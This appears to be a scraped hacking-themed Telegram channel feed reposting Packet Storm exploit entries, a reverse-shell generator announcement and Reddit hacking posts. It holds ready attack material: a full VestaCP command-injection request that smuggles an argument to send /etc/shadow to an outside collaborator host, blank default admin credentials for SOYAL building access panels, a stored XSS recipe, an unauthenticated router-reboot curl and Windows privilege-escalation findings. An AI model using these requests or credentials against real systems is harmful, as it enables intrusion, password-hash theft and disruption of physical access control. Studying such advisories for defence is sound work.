Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Exploit Collector
Boonex Dolphin 7.4.2 Cross Site Scripting

https://1.bp.blogspot.com/-ZbrkU7MDvJM/WWlvS7x--YI/AAAAAAAAINk/cO6KWZj5UFE3dAHctfHPCIXMYdjzVDfigCLcBGAs/s1600/h40.png
Boonex Dolphin version 7.4.2 suffers from a persistent cross site scripting vulnerability.

MD5 | 184f1fed969d0f5d89528bcd9596ddea

Download
# Exploit Title: Boonex Dolphin 7.4.2 - 'width' Stored XSS
# Date: 18-03-2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.boonex.com/
# Software Link: https://www.boonex.com/downloads
# Version: 7.4.2
# Tested on: Windows 10

# Reference - https://github.com/xoffense/POC/blob/main/Boonex%20Dolphin%20CMS%207.4.2%20%20stored%20XSS

Steps to Reproduce Bug:
1- Login to Admin Panel
2- Goto "Builders" => "Pages Builder"
3- Select any page
4- Turn on Burp Suite Intercept and Change "other pages width" to "1081px"


Source:packetstormsecurity.com
Exploit Collector
SOYAL Biometric Access Control System 5.0 Weak Default Credentials

https://4.bp.blogspot.com/-slZrAXCcTc4/WWlvSkUdx-I/AAAAAAAAINc/GD9pE2wpupUfP-XcYlxrz5jw2m91dZTOgCLcBGAs/s1600/h39.png
The web control panel SOYAL Biometric Access Control System version 5.0 uses a weak set of default administrative credentials (no password) that can be easily guessed in remote password attacks.

MD5 | 5c21b980433cae71313be94d4387bd2e

Download

SOYAL Biometric Access Control System 5.0 Weak Default Credentials
Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: AR-727 i/CM - F/W: 5.0
AR837E/EF - F/W: 4.3
AR725Ev2 - F/W: 4.3 191231
AR331/725E - F/W: 4.2
AR837E/EF - F/W: 4.1
AR-727CM /i - F/W: 4.09
AR-727CM /i - F/W: 4.06
AR-837E - F/W: 3.03

Summary: Soyal Access systems are built into Raytel Door Entry Systems
and are providing access and lift control to many buildings from public
and private apartment blocks to prestigious public buildings.

Desc: The web control panel uses weak set of default administrative
credentials (no password) that can be easily guessed in remote password
attacks.

Tested on: SOYAL Technology WebServer 2.0
SOYAL Serial Device Server 4.03A
SOYAL Serial Device Server 4.01n
SOYAL Serial Device Server 3.07n
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5631
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5631.php
25.01.2021

--
User: admin
Pass:

Source:packetstormsecurity.com
Exploit Collector
VestaCP 0.9.8 Command Injection

https://2.bp.blogspot.com/-x_QP5QrO-tY/WWlvkxoh72I/AAAAAAAAIQ4/t-2dHNJyeE0-qZNxsCg7sgdho_ipgPgbgCLcBGAs/s1600/h98.png
VestaCP version 0.9.8 suffers from a command injection vulnerability.

MD5 | 61152e8e70f2e0f61b717140e4415616

Download
# Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection
# Date: 17.03.2021
# Author: Numan TΓΌrle
# Vendor Homepage: https://vestacp.com
# Software Link: https://myvestacp.com < 0.9.8-26-43
# Software Link: https://vestacp.com < 0.9.8-26
POST /edit/server/ HTTP/1.1
Host: TARGET:8083
Connection: close
Content-Length: 6633
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
User-Agent: USER_AGENT
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Cookie: PHPSESSID=HERE_COOKIE
sec-gpc: 1

token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save
Parameter : v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow


Source:packetstormsecurity.com
Exploit Collector
Eclipse Mosquitto MQTT Broker 2.0.9 Unquoted Service Path

https://4.bp.blogspot.com/-4tZE0Y76jWM/WWlvMNv2FRI/AAAAAAAAIMQ/Di9LOyWyOssTbh7urhFnaBV0oE1qNf8CgCLcBGAs/s1600/h19.png
Eclipse Mosquitto MQTT broker version 2.0.9 suffers from an unquoted service path vulnerability.

MD5 | 7b03cd8371cf1bdb2ea70fac29527a20

Download
# Exploit Title: Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path
# Discovery by: Riadh Bouchahoua
# Discovery Date: 19-03-2021
# Vendor Homepage: https://mosquitto.org/
# Software Links : https://mosquitto.org/download/
# Tested Version: 2.0.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits

# Step to discover Unquoted Service Path:
====

C:\Users\Admin>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr "mosquitto"
mosquitto C:\Program Files\mosquitto\mosquitto.exe run

====

C:\Users\Admin>sc qc mosquitto
[SC] QueryServiceConfig rΓ©ussite(s)

SERVICE_NAME: mosquitto
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\mosquitto\mosquitto.exe run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Mosquitto Broker
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


Source:packetstormsecurity.com
Exploit Collector
SOYAL Biometric Access Control System 5.0 Cross Site Request Forgery

https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
SOYAL Biometric Access Control System version 5.0 suffers from a cross site request forgery vulnerability.

MD5 | 2893ad78302b33102388b180dc19506d

Download

SOYAL Biometric Access Control System 5.0 CSRF Change Admin Password
Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: AR-727 i/CM - F/W: 5.0
AR837E/EF - F/W: 4.3
AR725Ev2 - F/W: 4.3 191231
AR331/725E - F/W: 4.2
AR837E/EF - F/W: 4.1
AR-727CM /i - F/W: 4.09
AR-727CM /i - F/W: 4.06
AR-837E - F/W: 3.03

Summary: Soyal Access systems are built into Raytel Door Entry Systems
and are providing access and lift control to many buildings from public
and private apartment blocks to prestigious public buildings.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

Tested on: SOYAL Technology WebServer 2.0
SOYAL Serial Device Server 4.03A
SOYAL Serial Device Server 4.01n
SOYAL Serial Device Server 3.07n
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5632
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php
25.01.2021

--
...

Source:packetstormsecurity.com
Exploit Collector
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Unauthenticated Device Reboot

https://4.bp.blogspot.com/-INMz00VTlDg/WWlvPzJvf6I/AAAAAAAAIM4/tZDwU9OuM_wuiTGIuyom6E8lddjUI2D5ACLcBGAs/s1600/h29.png
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE version 2.0.1 allows unauthenticated attackers to restart the device with an HTTP GET request to /goform/RestartDevice page.

MD5 | bdaea7da6759d7010755dac41c4e9199

Download

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Unauthenticated Device Reboot (DoS)
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/

Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.

Desc: The device allows unauthenticated attackers to restart the
device with an HTTP GET request to /goform/RestartDevice page.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5643
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php
03.02.2021

--
$ curl -sk https://192.168.1.1/goform/RestartDevice
success
$

Source:packetstormsecurity.com
Exploit Collector
SOYAL 701Server 9.0.1 Insecure Permissions

https://2.bp.blogspot.com/-Nz8u9CyJbsU/WWlveW9d4WI/AAAAAAAAIPw/tdSVtwWBcYIHlgRN6nbdKVd_fE-UdNKsACLcBGAs/s1600/h80.png
SOYAL 701Server version 9.0.1 suffers from an insecure permissions vulnerability.

MD5 | 3b51fa9ee0f73925df5fd8339e92606f

Download

SOYAL 701Server 9.0.1 Insecure Permissions
Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: 9.0.1 190322
8.0.6 181227

Summary: 701 Server is the program used to set up and configure LAN
and IP based access control systems, from the COM port used to the
quantity and type of controllers connected. It is also used for
programming some of the more complex controllers such as the AR-716E
and the AR-829E.

Desc: The application suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'F' flag (Full) for 'Everyone'
and 'Authenticated Users' group.

Tested on: Microsoft Windows 10 Enterprise
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5633
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5633.php
25.01.2021

--
C:\Program Files (x86)\701Server>cacls McuServer.exe
C:\Program Files (x86)\701Server\McuServer.exe Everyone:F
NT AUTHORITY\Authenticated Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\701Server>

Source:packetstormsecurity.com
Reverse-Shell-Generator - Hosted Reverse Shell Generator With A Ton Of Functionality
http://www.kitploit.com/2021/03/reverse-shell-generator-hosted-reverse.html
Hosted Reverse (https://www.kitploit.com/search/label/Reverse) Shell generator (https://www.kitploit.com/search/label/Generator) with a ton of functionality -- (great for CTFs)

Hosted Instance
https://revshells.com (https://revshells.com/)
Features
Generate common listeners and reverse shells Automatically copy to clipboard Button to increment the listening port number by 1 URI and Base64 encoding LocalStorage to persist your configuration Dark and Light Modes
Credits
weibell briskets papadope 0day 0x03f3

Download Reverse-Shell-Generator (https://github.com/0dayCTF/reverse-shell-generator)
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Reverse-Shell-Generator - Hosted Reverse Shell Generator With A Ton Of Functionality

https://1.bp.blogspot.com/-e6daj4fXTXA/YE6InY9pDNI/AAAAAAAAVnI/jNlpJHs-78IrXYlztNxv1y-j72mtaa89gCNcBGAsYHQ/w640-h530/reverse-shell-generator_2.png
Hosted Reverse Shell generator with a ton of functionality -- (great for CTFs)
Hosted Instance

https://revshells.com

Features

* Generate common listeners and reverse shells
* Automatically copy to clipboard
* Button to increment the listening port number by 1
* URI and Base64 encoding
* LocalStorage to persist your configuration
* Dark and Light Modes

Credits

* weibell
* briskets
* papadope
* 0day
* 0x03f3
Download Reverse-Shell-Generator
hacking: security in practice
Recover my own password Windows 7 login user

Hello I forgot my own password to very old VMware with windows 7 user logon But it auto logins with netplwiz Is there a smart way to brute force by patterns or recover password? I really need to remember recover password.... Reset won't do it

submitted by /u/redditusermazafaka
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Hack Windows 10 In Under 5 Seconds! (BadUSB)

Hello guys,

Thanks for watching my video. This was a quick tutorial on how to gain access to a windows 10 machine using a bad USB in under 5 seconds. If you would like to see more BadUSB videos please let me know.

https://www.youtube.com/watch?v=hrWVo19l7Ag

​

​

https://preview.redd.it/r1czyedbm5o61.png?width=1920&format=png&auto=webp&s=ea571322b9b66649ef78d5e5152a3f3fee69296b

submitted by /u/Delicious_Piece_2216
[link] [comments]
hacking: security in practice
Weird buzzing noise

I always use my earphones to listen to an asmr video on YouTube before I sleep. Usually I wake up with earphones still on my ears, and the video already finished, so the earphones just hanging there without playing anything but sometimes when I'm too lazy to get up I heard quick and loud static noise. The sound is like the buzz sound when you use walkie talkie. Usually only happen once and didn't repeat even if I wait and listen for it to happen again. This happen every day. I thought it was my earphones, so I changed my samsung earphones with a new gaming earphones I just bought. But I still hear that quick random buzz.

I'm worried in case if my phone is tapped, because when I brought it to Samsung center I was like "my phone is still new, all settings is still factory setting" and their technician replied with a joke that maybe someone is tapping my phone. Is it true tho? Is there a tool to check it? Or is it just something normal like phone signals interference?

submitted by /u/More_Ant4463
[link] [comments]
Bashrc Linux Privilege Escalation
https://www.reddit.com/r/Pentesting/comments/m95q3k/bashrc_linux_privilege_escalation/

<!-- SC_OFF -->Hope this can be helpful to some of you, it's not a very common privesc method in CTFs although it can be fairly common in real-life engagements when system admins get lazy. Let me know if there are other less common methods you know of! https://steflan-security.com/?p=2330 <!-- SC_ON --> submitted by /u/cantchooseone96 (https://www.reddit.com/user/cantchooseone96)
[link] (https://www.reddit.com/r/Pentesting/comments/m95q3k/bashrc_linux_privilege_escalation/) [comments] (https://www.reddit.com/r/Pentesting/comments/m95q3k/bashrc_linux_privilege_escalation/)
OAuth Misconfiguration found in small time-window of attack

Hi Everyone,Continue reading on Medium Β»
Read more...